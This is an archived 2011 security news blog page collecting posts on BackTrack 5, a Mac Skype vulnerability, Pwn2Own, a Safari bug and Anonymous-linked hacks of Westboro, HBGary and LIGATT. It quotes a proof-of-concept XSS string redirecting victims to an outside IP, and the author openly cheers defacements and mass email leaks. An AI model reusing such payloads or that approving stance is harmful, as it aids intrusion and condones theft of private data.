Warning: mysqli_num_fields() expects parameter 1 to be mysqli_result, boolean given in /home/adminseb/public_html/wp-includes/wp-db.php on line 3283

Warning: mysqli_num_fields() expects parameter 1 to be mysqli_result, boolean given in /home/adminseb/public_html/wp-includes/wp-db.php on line 3283
Hacking | Security Generation - Part 2
Skip to content

Posts from the ‘Hacking’ Category

11
May

BackTrack 5 “Revolution” Released

The most popular security and penetration testing Linux distribution has been updated once again, this time built from scratch! BackTrack 5, codenamed “Revolution”, is based on Ubuntu Lucid LTS with kernel 2.6.38, and brings with it full 32 and 64-bit support, an ARM-compatible image, forensics and stealth modes, KDE (4.6) and Gnome (2.6) desktop environments, and (allegedly) over 350 updated security tools including Metasploit 3.7.0. Best of all it’s “aligned with industry methodologies”! Whatever that means ;)

It appears BackTrack 5 will only be available torrents for the time being. The torrents are available in the following flavours: Gnome ISO (32bit, 64bit, ARM img), Gnome 32-bit VMware Image, KDE ISO (32bit, 64bit). Here’s the BackTrack downloads page. Those of you wondering which flavour to get between Gnome and KDE, it’s largely dependent on one’s taste, but the BackTrack guys appear to be favouring Gnome (which was the default Ubuntu graphics environment). If you have no idea what to get, then grab the Gnome 32-bit ISO (or VMware image) using the links above. I recommend Transmission (Mac) or uTorrent (Mac/PC) for BitTorrent clients. For anyone who hasn’t used BT before, the default username and password is root/toor.

BackTrack is a great tool for network security specialists and penetration testers, but it’s an even more valuable resource for people looking at learning more about application and network security (and Linux). Although I do have an Ubuntu install, I tend to use BackTrack more often due to the convenience (when I’m not using OSX that is ;).

It’s not possible to upgrade from BT4r2 to BT5, so those of you with installations of BackTrack 4 will need to reinstall (or download the new VM).

Check out their shiny promotional video below!

[Updated] BackTrack 5 R2 is now available, and brings a new kernel and 42 new tools. You can update your existing BT5 (R1) installation by running:

echo “deb http://updates.repository.backtrack-linux.org revolution main microverse non-free testing” >> /etc/apt/sources.list

apt-get update

apt-get dist-upgrade

7
May

Mac OS X Skype 0day Remote Code Execution Vulnerability [Updated]

A fairly significant 0day vulnerability is being reported in the Skype client (< 5.1.0.922) for Mac OS X. By sending a specially-crafted instant message, an attacker may be able to remotely execute code on the recipient’s computer and gain access to a root shell. This issue has been discovered (by accident it seems) by Gordon Maddern of Australian security consultancy Pure Hacking.

“About a month ago I was chatting on skype to a collegue about a payload for one of our clients.  Completely by accident, my payload executed in my collegues skype client. I decided to investigate a little further and found that the Windows and Linux clients were not vulnerable. It was only the Mac skype client that seemed to be affected. […] Low and behold (sic) I was able to remotely gain a shell.”

It is believed that due to the relative simplicity in the delivery of the payload, it may be possible for this attack to be automated in the form of a worm. Skype are aware of this issue, but have yet to release a patch (see below). Mac users should be extra careful until a patch is made available, and in the short term I recommend quitting Skype when not using it, or at least checking that your Skype client is set to only allow messages from your contacts (Skype > Preferences > Privacy Tab > Allow Messages From: Contacts).

No further details or proof-of-concept of the vulnerability are available as of yet, although I’d be interested to see it… time to start pasting random Metasploit payloads into Skype! ;)

[Updated 8/5/2011] Skype addressed this vulnerability in version 5.1.0.922 of the Mac OS X client. Run the updater by going to the Skype menu > Check for Updates, or download the latest  version here.

Full disclosure of the vulnerability is now available here. In short, the issue was a persistent XSS that could be used to redirect the user to a malicious website. Here’s the PoC attack string:

http://www.example.com/?foo=”><script>document.location=’http://10.11.1.225′;</script>

14
Apr

WordPress.com Hacked and Rooted (but not exposed?)

WordPress.com (the blog hosting platform) was compromised by hackers using an undisclosed vulnerability. My guess is the attackers found an unpatched server somewhere, and used that to get into the environment. Information from Automattic is limited, but they’re assuming that source code and other information was probably stolen. Nobody has come forth to claim the hack, or post WordPress’ source code and account information online, Gawker-style.

If you have a blog on WordPress.com, I recommend changing your password there (and on any other site where you may have used the same password). If you host your own WordPress blog, there isn’t cause for concern just yet as there are many ways that the hackers could have gotten root access, so the vulnerability used may not be within the WordPress software itself.

I’ll update this post should any more information come to light.

11
Mar

Browser and Smartphone Exploits Fly at Pwn2Own [Recap]

With Google offering $20,000 for a Chrome sandbox exploit, Apple releasing fresh security updates, and the organisers allowing researchers to target mobile phone basebands, it was sure make for an interesting Pwn2Own contest at CanSecWest this year.

For the fifth year running, Pwn2Own invited security researchers to discover vulnerabilities and develop exploits for the most popular browsers on Mac OS X and Windows (for some reason Linux is left out this year). Traditionally IE, Firefox and Safari have gotten exploited, with Chrome being the last browser standing at last year’s competition. Google upped the ante by making it significantly more attractive to target their browser this year.

In short: Safari, Internet Explorer, iPhone and Blackberry were all successfully compromised. Chrome and Firefox survive. Hit the jump for the full details! Read moreRead more

10
Mar

Safari Errorjacking Vulnerability and Exploit [Patched]

One of the vulnerabilities patched in Safari 5.0.4 is a fairly critical issue in WebKit (CVE-2011-0167) that allows Javascript to jump into the local zone, and access any file on the local computer that is accessible to the current user. This could be used by malicious websites to extract files and information from the victim’s computer. The vulnerability affects Safari on Mac OS X and Windows, and could affect other WebKit-based browsers, although Chrome is safe due to added restrictions.

The bug exists because most browser error pages are loaded from the local “file:” zone, a zone that Javascript is not normally allowed to access directly. Since a child browser window remains under the control of the parent, it is possible to cause a child browser window to error, thus entering the normally-restricted local zone, and then instructing the child window to access local files using this elevated local-zone privilege.

This issue was a nice catch, discovered by Aaron Sigel who has a detailed explanation, video demo and proof-of-concept on his blog. It probably goes without saying, but Safari users should run Software Update as soon as possible.

25
Feb

Anonymous Deface Westboro Baptist Church Site Live On Air

Anonymous recently found themselves entangled with the Westboro Baptist Church (WBC) after the homophobic religious zealots published a taunt where they dared the hacktivist group to ‘bring it’. Anonymous quickly announced that they had never threatened the church in any way. I’m inclined to believe them because, as lame and hateful the church and their members are, Anonymous are busier fighting for freedom in North Africa and the Middle East than they are exposing ridiculous religious groups in Kansas. Instead, another hacktivist known as th3j35t3r (@th3j34t3r) joined in the fight, bringing down five of WBC’s hate-spewing websites.

Not happy to leave the matter alone, or rather perfectly happy for some more media whoring, Westboro decided to go on air and pour some fuel on the fire. In the interview Shirley Phelps-Roper, a ridiculously immature and inarticulate representative of WBC, faced off against a comparatively calm and bemused representative of Anonymous. Anon reiterated that they did not initially threaten WBC, and during the interview proceeded to deface one of the church’s sites with a message from the group. Excerpt:

Your continued biting of the Anonymous hand… has earned you a swift and emotionless bitchslap, in the form of this very message. […] For this unremitting display of overzealousness, we award you no points. Take this defacement as a simple warning: go away. The world (including Anonymous) disagrees with your hateful messages, but you have the right to voice them. This does not mean you can jump onto Anonymous for attention.

These WBC idiots really make me rage, and they make honest Christians look bad. Anonymous, th3j35t3r, I tip my hat to you on this one. Check out the video of the interview below.

22
Feb

BackTrack 5 “Revolution” in Development (Screenshots)

Click to enlarge

BackTrack 5 – codenamed “Revolution” – is currently under development, and the team is working on updating both system and tools. At the moment it’s running a 2.6.38-rc5 kernel, improved wireless drivers, and a new KDE 4 theme is being put together.

An initial release won’t be available for at least a couple months. If you have any requests or recommendations, now’s the time to make them on the BackTrack forums.

Here are a few teaser screenshots of BT5.

[Updated 10/5/2011] BackTrack 5 is out!

11
Feb

Researchers Extract iPhone Data and Passwords in Minutes

A group of German security researchers from the Fraunhofer Institute for Secure Information Technology have discovered a way of extracting personal information and stored credentials from a locked iPhone, by way of a jailbreak. By gaining physical access to an iPhone (or iPad/iTouch), an attacker is able to reboot it into recovery mode, thus allowing them to upload their own jailbroken firmware onto the device. As part of this process SSH is enabled and a script can then be uploaded to the device which uses built-in system calls to extract encrypted data (including credentials in the keychain) from the device. See the video below for a demo of their attack, which can take as little as six minutes.

This attack would not be possible without existing jailbreak mechanisms, which effectively bypass the iPhone’s sandbox and allow unsigned code to be executed. The second issue is the way that iOS handles stored data and credentials, allowing any application to request the information. This is actually a prime example of the dangers of having a jailbroken iPhone or iPad, as it makes it much easier for an attacker to execute malicious code on your device.

These kinds of issues are not isolated to iOS devices, and the same would exist on other devices that could be made to run custom scripts. This will be a tricky issue for Apple to resolve, as much of its security relies on a strong sandbox. Their best chance is to try to identify and patch as many of the vulnerabilities that could be used for a jailbreak. They will also need to review the way iOS handles encrypted data, and ensure that data cannot be extracted by arbitrary applications.

Luckily there is not yet a publicly available automated tool to perform this attack, so it is unlikely that a random thief will be obtaining your data. If you’re really worried, you can use Apple’s free Find My iPhone service to remotely wipe your iOS device should it be lost or stolen. Check out my article on protecting and recovering your iPhone from loss and theft for more information.

The team’s original research paper is available here (PDF).

10
Feb

HBGary: Security Firm Investigating ‘Anonymous’ Hacked and Exposed

“Do not meddle in the affairs of hackers, for they are subtle and quick to anger.”

Following last week’s hacking of shamed LIGATT CEO Gregory D Evans, this week it was the turn of security firm HBGary to get exposed. HBGary have been aiding the FBI with their investigations into members of Anonymous. Although Anonymous isn’t a centralised ‘group’, their recent DDoS attacks and hacks of oppressive governments and anti-wikileaks organisations (including PayPal, MasterCard and VISA), have made them a target of the US Federal Government.

HBGary were allegedly preparing to hand over information about certain members of Anonymous to the FBI, who have already made several arrests in the US and UK, and obtained over 40 search warrants in an attempt to shut down Anonymous (probably not possible imo). Angered by CEO Aaron Barr and HBGary’s involvement in FBI investigations, members of Anonymous compromised a number of HBGary servers, defacing their website, gaining access to CEO Aaron Barr’s Twitter account, and obtaining a large number of emails. In what seems to be the popular punishment at the moment, over 50,000 corporate emails were released in a torrent. Anonymous also stated, on one of their many Twitter accounts, that the source code of HBGary’s security products was also obtained – although these don’t appear to have been released (yet?).

“You’ve angered the hive, and now you are being stung.”

Anonymous posted a message to HBGary on their defaced website, where they mock the firm for their lack of security and the unsubstantial ‘public’ information that was going to be handed sold to the FBI.

Hit the jump for Anonymous’ full message.

Ars Technica has a good review of how this all went down, and a step-by-step account of how the hack was possible.

[Update] Aaron Barr steps down as CEO of HBGary Federal

Read moreRead more

3
Feb

LIGATT CEO Gregory D Evans Hacked and Exposed

It appears that the website (rm’d), email and Twitter account of the much disliked LIGATT CEO Gregory D Evans have been hacked, and 84,668 of his emails have been leaked in a 4.15GB torrent. Evans, self-declared “World’s Number 1 Hacker” and also a convicted felon, is frequently outed by many in the security industry for his use of plagiarism, fraud and unethical practices. This leak is probably due to his consistent harassment of security professionals who have been vocal about exposing his activities. A full and descriptive profile of Evans is available at SecurityErrata.org.

Messages were posted on Evans’ hacked Twitter account (above), pointing to a Pastebin (since removed). Here is an excerpt:

Do not meddle in the affairs of hackers, for they are subtle and quick to anger.

When one thinks of frauds in the infosec community, most people are quick to point to Gregory D Evans of LIGATT Security[…]

He’s gone after people at their home to intimidate them and their family. He’s gone after them at their work to discredit them with their employer. And as everyone knows, he recklessly sues anyone who speaks negatively of him on the internet[…]

Enough is enough. He must be stopped by any means necessary. To that end, at the end of this message is a torrent of the inbox of gregoryevans@ligatt.com.

The end of the message contained a link to another pastebin (also removed), which was a Base64-encoded torrent file. The password for the archive in the torrent, as posted on his Twitter feed, is “DoomedCharlatan”. Ligattleaks (now offline), a site dedicated to leaking information about Gregory Evans’ activity (although they say they were not involved in this particular leak), have announced that they will be trawling the emails for evidence of fraud and unethical behaviour.

[Updated] Ligattleaks is back online offline online offline, for good it seems. Another security firm (HBGary) hacked and exposed for investigating Anonymous.

[Update 15/2/2011] CBS Atlanta had a news segment about LIGATT and Gregory Evans entitled “Hacker or Hoax”.  LIGATT responds to CBS Atlanta (link removed as his site was found to be distributing malware). This post debunks LIGATT’s response.

css.php